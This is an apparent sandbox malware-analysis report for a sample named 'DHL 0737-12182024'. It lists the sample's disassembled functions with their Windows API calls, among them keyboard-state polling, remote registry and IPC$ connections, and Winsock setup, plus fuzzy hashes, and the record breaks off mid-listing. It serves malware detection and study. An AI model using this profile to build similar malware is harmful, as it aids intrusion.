                                                                                            • Instruction ID: 747a05c64eaad838ce8c21ffcb58e6e4391d8edfa9efba1ec1392e56a1f07788
                                                                                            • Opcode Fuzzy Hash: 9e08bc0357ff0d3d8f2424ea4ad20bab93a4ca007d010035f29b771f1655669a
                                                                                            • Instruction Fuzzy Hash: 2031AD7290420AABDB20ABA4DC48FAF37BCFF88700F1441B5F619D6160EB7497448B24
                                                                                            Function 0088E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • timeGetTime.WINMM ref: 0088E6B4
                                                                                              • Part of subcall function 0083E551: timeGetTime.WINMM(?,?,0088E6D4), ref: 0083E555
                                                                                            • Sleep.KERNEL32(0000000A), ref: 0088E6E1
                                                                                            • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0088E705
                                                                                            • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0088E727
                                                                                            • SetActiveWindow.USER32 ref: 0088E746
                                                                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0088E754
                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 0088E773
                                                                                            • Sleep.KERNEL32(000000FA), ref: 0088E77E
                                                                                            • IsWindow.USER32 ref: 0088E78A
                                                                                            • EndDialog.USER32(00000000), ref: 0088E79B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                            • String ID: BUTTON
                                                                                            • API String ID: 1194449130-3405671355
                                                                                            • Opcode ID: a1428e8900b675f98284af4cfea6d56455672c80c483387f0b4f29c122f30612
                                                                                            • Instruction ID: dfff6b3824257e712ed5fd4e42a813a446f9cc423365971a3ea3d96022add3d1
                                                                                            • Opcode Fuzzy Hash: a1428e8900b675f98284af4cfea6d56455672c80c483387f0b4f29c122f30612
                                                                                            • Instruction Fuzzy Hash: CF215EB0200605AFEB10BFB4EDC9E363B69FB65B49F101525F516C22B1EBB5AC00DB25
                                                                                            Function 0088E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00829CB3: _wcslen.LIBCMT ref: 00829CBD
                                                                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0088EA5D
                                                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0088EA73
                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0088EA84
                                                                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0088EA96
                                                                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0088EAA7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: SendString$_wcslen
                                                                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                            • API String ID: 2420728520-1007645807
                                                                                            • Opcode ID: 9c1ea19f47a590c9bb2d5c33a5b536b2abf105e7148baf341dad29f509ca399a
                                                                                            • Instruction ID: 87b6400c7098e4ed4432296102782cdeddc44a6087a537869c9a3b2b06e8f4cf
                                                                                            • Opcode Fuzzy Hash: 9c1ea19f47a590c9bb2d5c33a5b536b2abf105e7148baf341dad29f509ca399a
                                                                                            • Instruction Fuzzy Hash: 9C116D61A5026979D724B7A6ED4ADFB6A7CFBA2F80F000429B811E21D1EA600A54C6B1
                                                                                            Function 00885CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,00000001), ref: 00885CE2
                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00885CFB
                                                                                            • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00885D59
                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00885D69
                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00885D7B
                                                                                            • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00885DCF
                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00885DDD
                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00885DEF
                                                                                            • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00885E31
                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 00885E44
                                                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00885E5A
                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00885E67
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                                                            • String ID:
                                                                                            • API String ID: 3096461208-0
                                                                                            • Opcode ID: 24e3af680dcff2a49788863b2e859553d8aac73d2511782c0976d53ba6513862
                                                                                            • Instruction ID: b6689d463180b4dd77c4ed20852612658544928e318f140f4c92780ed78d3b39
                                                                                            • Opcode Fuzzy Hash: 24e3af680dcff2a49788863b2e859553d8aac73d2511782c0976d53ba6513862
                                                                                            • Instruction Fuzzy Hash: BD510E71B00609AFDF18DF68DD89AAEBBB5FB58301F148229F915E7290D770AE04CB50
                                                                                            Function 00838BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00838F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00838BE8,?,00000000,?,?,?,?,00838BBA,00000000,?), ref: 00838FC5
                                                                                            • DestroyWindow.USER32(?), ref: 00838C81
                                                                                            • KillTimer.USER32(00000000,?,?,?,?,00838BBA,00000000,?), ref: 00838D1B
                                                                                            • DestroyAcceleratorTable.USER32(00000000), ref: 00876973
                                                                                            • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00838BBA,00000000,?), ref: 008769A1
                                                                                            • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00838BBA,00000000,?), ref: 008769B8
                                                                                            • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00838BBA,00000000), ref: 008769D4
                                                                                            • DeleteObject.GDI32(00000000), ref: 008769E6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                            • String ID:
                                                                                            • API String ID: 641708696-0
                                                                                            • Opcode ID: 4a9360746dcb2be0e7786dc57d433f76385dc0466a1a7c7e7c1d944bb8a01499
                                                                                            • Instruction ID: db1311eb16be37f0bbb048f20ce1dd35b6449a1a38c275966c3a57898a9e9bbd
                                                                                            • Opcode Fuzzy Hash: 4a9360746dcb2be0e7786dc57d433f76385dc0466a1a7c7e7c1d944bb8a01499
                                                                                            • Instruction Fuzzy Hash: 29618A30502B14DFCB259F29CA48B25BBF1FB90316F149528E086DBA64CB75E991CBE0
                                                                                            Function 00839838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00839944: GetWindowLongW.USER32(?,000000EB), ref: 00839952
                                                                                            • GetSysColor.USER32(0000000F), ref: 00839862
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ColorLongWindow
                                                                                            • String ID:
                                                                                            • API String ID: 259745315-0
                                                                                            • Opcode ID: f84130315686f8de48a41e6d8dd747d986cce969a1c92b8c057628c3f6fc9c18
                                                                                            • Instruction ID: d91b4e59a9ae4f94b961b525e85656a6be97455cbe685cb15a1e3e9f47441b3d
                                                                                            • Opcode Fuzzy Hash: f84130315686f8de48a41e6d8dd747d986cce969a1c92b8c057628c3f6fc9c18
                                                                                            • Instruction Fuzzy Hash: BD41AF31104644AFDB205F389C88BBA7BA5FB86330F144665F9E2D72E1C7B19841DB60
                                                                                            Function 008896E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0086F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00889717
                                                                                            • LoadStringW.USER32(00000000,?,0086F7F8,00000001), ref: 00889720
                                                                                              • Part of subcall function 00829CB3: _wcslen.LIBCMT ref: 00829CBD
                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0086F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00889742
                                                                                            • LoadStringW.USER32(00000000,?,0086F7F8,00000001), ref: 00889745
                                                                                            • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00889866
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: HandleLoadModuleString$Message_wcslen
                                                                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                            • API String ID: 747408836-2268648507
                                                                                            • Opcode ID: 91b56e6fdf3a4bc0f8647ba349365c6959c848bceb3723a7579ae2cca88a2928
                                                                                            • Instruction ID: 27ca311335daf38a88fd99df93452eac092f3e956312989e24696216ea959a2d
                                                                                            • Opcode Fuzzy Hash: 91b56e6fdf3a4bc0f8647ba349365c6959c848bceb3723a7579ae2cca88a2928
                                                                                            • Instruction Fuzzy Hash: 84412E72800229AACB04FBE8ED56DEE7778FF55340F540465F605F2192EA356F88CB62
                                                                                            Function 008806DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00826B57: _wcslen.LIBCMT ref: 00826B6A
                                                                                            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 008807A2
                                                                                            • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 008807BE
                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 008807DA
                                                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00880804
                                                                                            • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0088082C
                                                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00880837
                                                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0088083C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                            • API String ID: 323675364-22481851
                                                                                            • Opcode ID: ed55fb9b801395e4ed95e2c4f9199ae02969293c3dd91f5c2e48e85b919bff65
                                                                                            • Instruction ID: c14cdd4d45098297e7707900f5f39c75a4f348dd6eda25dcefbb9b06556ebc01
                                                                                            • Opcode Fuzzy Hash: ed55fb9b801395e4ed95e2c4f9199ae02969293c3dd91f5c2e48e85b919bff65
                                                                                            • Instruction Fuzzy Hash: 4F41E972C10229ABDF15EBA4EC958EEB778FF04750F054129E911E7261EB349E48CFA1
                                                                                            Function 008A3C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • VariantInit.OLEAUT32(?), ref: 008A3C5C
                                                                                            • CoInitialize.OLE32(00000000), ref: 008A3C8A
                                                                                            • CoUninitialize.OLE32 ref: 008A3C94
                                                                                            • _wcslen.LIBCMT ref: 008A3D2D
                                                                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 008A3DB1
                                                                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 008A3ED5
                                                                                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 008A3F0E
                                                                                            • CoGetObject.OLE32(?,00000000,008BFB98,?), ref: 008A3F2D
                                                                                            • SetErrorMode.KERNEL32(00000000), ref: 008A3F40
                                                                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 008A3FC4
                                                                                            • VariantClear.OLEAUT32(?), ref: 008A3FD8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                            • String ID:
                                                                                            • API String ID: 429561992-0
                                                                                            • Opcode ID: 8cea0d588a957fbeda13759f18fc730b58e526b48c4050eba6a553385782d050
                                                                                            • Instruction ID: 8ce546ed69e5be26db3f92780dbbcd6e9e47e534ef1ce8a1860e0a1f29a2c45e
                                                                                            • Opcode Fuzzy Hash: 8cea0d588a957fbeda13759f18fc730b58e526b48c4050eba6a553385782d050
                                                                                            • Instruction Fuzzy Hash: D7C115716082059FE700DF68C88492BBBE9FF8A748F14491DF98ADB611DB31EE45CB52
                                                                                            Function 00897A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CoInitialize.OLE32(00000000), ref: 00897AF3
                                                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00897B8F
                                                                                            • SHGetDesktopFolder.SHELL32(?), ref: 00897BA3
                                                                                            • CoCreateInstance.OLE32(008BFD08,00000000,00000001,008E6E6C,?), ref: 00897BEF
                                                                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00897C74
                                                                                            • CoTaskMemFree.OLE32(?,?), ref: 00897CCC
                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00897D57
                                                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00897D7A
                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00897D81
                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00897DD6
                                                                                            • CoUninitialize.OLE32 ref: 00897DDC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                            • String ID:
                                                                                            • API String ID: 2762341140-0
                                                                                            • Opcode ID: d2acea2e0325e9ce54a4a69ea252ce717c21ee7e5402869026782bd56263b32b
                                                                                            • Instruction ID: 51cc3658653ad329d809d060a01c51aca5d623d77b00513b4788330f1b1d125e
                                                                                            • Opcode Fuzzy Hash: d2acea2e0325e9ce54a4a69ea252ce717c21ee7e5402869026782bd56263b32b
                                                                                            • Instruction Fuzzy Hash: A3C10A75A04119AFCB14DF64C884DAEBBB9FF48314B1485A9F81ADB361D730EE45CB90
                                                                                            Function 008B541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 008B5504
                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 008B5515
                                                                                            • CharNextW.USER32(00000158), ref: 008B5544
                                                                                            • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 008B5585
                                                                                            • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 008B559B
                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 008B55AC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$CharNext
                                                                                            • String ID:
                                                                                            • API String ID: 1350042424-0
                                                                                            • Opcode ID: ddbd65a8885ee3f92181f0ba6c1e000b557d6898743768a3e43f58999cc8dcea
                                                                                            • Instruction ID: 98da07cdebeda7c45bf35f36cb96587d96b33fe60454a1ac9dc3eb2e3dd23fb0
                                                                                            • Opcode Fuzzy Hash: ddbd65a8885ee3f92181f0ba6c1e000b557d6898743768a3e43f58999cc8dcea
                                                                                            • Instruction Fuzzy Hash: FE617970900609AFDF209FA4DC84EFE7BB9FB0A725F104149F925EA391D7749A80DB61
                                                                                            Function 0087FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0087FAAF
                                                                                            • SafeArrayAllocData.OLEAUT32(?), ref: 0087FB08
                                                                                            • VariantInit.OLEAUT32(?), ref: 0087FB1A
                                                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 0087FB3A
                                                                                            • VariantCopy.OLEAUT32(?,?), ref: 0087FB8D
                                                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 0087FBA1
                                                                                            • VariantClear.OLEAUT32(?), ref: 0087FBB6
                                                                                            • SafeArrayDestroyData.OLEAUT32(?), ref: 0087FBC3
                                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0087FBCC
                                                                                            • VariantClear.OLEAUT32(?), ref: 0087FBDE
                                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0087FBE9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                            • String ID:
                                                                                            • API String ID: 2706829360-0
                                                                                            • Opcode ID: d0a7ca3901d70c25fd1bb51a757139076d76dccf69a4941985d777dc7e92c319
                                                                                            • Instruction ID: e38643a87d4e25dea4f86fc001e5f9958153b0dd861948283cbe903919786277
                                                                                            • Opcode Fuzzy Hash: d0a7ca3901d70c25fd1bb51a757139076d76dccf69a4941985d777dc7e92c319
                                                                                            • Instruction Fuzzy Hash: 01413E35A00219DFCF00DF69D8549AEBBB9FF48354F008569E959E7262CB30EA45CFA1
                                                                                            Function 00889C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetKeyboardState.USER32(?), ref: 00889CA1
                                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00889D22
                                                                                            • GetKeyState.USER32(000000A0), ref: 00889D3D
                                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 00889D57
                                                                                            • GetKeyState.USER32(000000A1), ref: 00889D6C
                                                                                            • GetAsyncKeyState.USER32(00000011), ref: 00889D84
                                                                                            • GetKeyState.USER32(00000011), ref: 00889D96
                                                                                            • GetAsyncKeyState.USER32(00000012), ref: 00889DAE
                                                                                            • GetKeyState.USER32(00000012), ref: 00889DC0
                                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00889DD8
                                                                                            • GetKeyState.USER32(0000005B), ref: 00889DEA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: State$Async$Keyboard
                                                                                            • String ID:
                                                                                            • API String ID: 541375521-0
                                                                                            • Opcode ID: 11ab7cc813602dc1eac46654e82268497ff20c5c42c1fa453859a87ded7dcac1
                                                                                            • Instruction ID: 89ff279fa4f154daf1d3208ae910b8d0e95f816b3db2537bc9aba081bd07effc
                                                                                            • Opcode Fuzzy Hash: 11ab7cc813602dc1eac46654e82268497ff20c5c42c1fa453859a87ded7dcac1
                                                                                            • Instruction Fuzzy Hash: 2141A6346047C96DFF31A664C8043B5BEE1FF11344F0C815ADAC6965C2EBE599C8C7A6
                                                                                            Function 008A055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • WSAStartup.WSOCK32(00000101,?), ref: 008A05BC
                                                                                            • inet_addr.WSOCK32(?), ref: 008A061C
